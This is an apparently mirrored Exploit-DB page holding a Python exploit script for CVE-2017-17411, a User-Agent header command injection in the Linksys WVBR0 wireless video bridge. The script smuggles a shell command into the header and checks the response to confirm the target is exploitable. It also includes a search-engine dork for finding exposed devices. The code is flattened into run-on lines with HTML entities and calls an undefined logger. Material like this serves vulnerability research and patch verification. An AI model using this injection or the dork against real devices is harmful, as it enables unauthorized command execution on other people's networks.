Linksys WVBR0 – ‘User-Agent’ Remote Command Injection

• Exploit Database
• 115 阅读

• 作者： nixawk
  日期： 2017-12-14
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/43363/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71

  #!/usr/bin/python # -*- coding: utf-8 -*-   # Author: Nixawk # CVE-2017-17411 # Linksys WVBR0 25 Command Injection   """ $ python2.7 exploit-CVE-2017-17411.py [*] Usage: python exploit-CVE-2017-17411.py <URL>   $ python2.7 exploit-CVE-2017-17411.py http://example.com/ [+] Target is exploitable by CVE-2017-17411 """   import requests     def check(url): payload = &apos;"; echo "admin&apos; md5hash = "456b7016a916a4b178dd72b947c152b7"# echo "admin" | md5sum   resp = send_http_request(url, payload)   if not resp: return False   lines = resp.text.splitlines() sys_cmds = filter(lambda x: "config.webui sys_cmd" in x, lines)   if not any([payload in sys_cmd for sys_cmd in sys_cmds]): return False   if not any([md5hash in sys_cmd for sys_cmd in sys_cmds]): return False   print("[+] Target is exploitable by CVE-2017-17411 ") return True     def send_http_request(url, payload): headers = { &apos;User-Agent&apos;: payload }   response = None try: response = requests.get(url, headers=headers) except Exception as err: log.exception(err)   return response     if __name__ == &apos;__main__&apos;: import sys   if len(sys.argv) != 2: print("[*] Usage: python %s <URL>" % sys.argv[0]) sys.exit(0)   check(sys.argv[1])     # google dork: "Vendor:LINKSYS ModelName:WVBR0-25-US"   ## References   # https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair # https://thehackernews.com/2017/12/directv-wvb-hack.html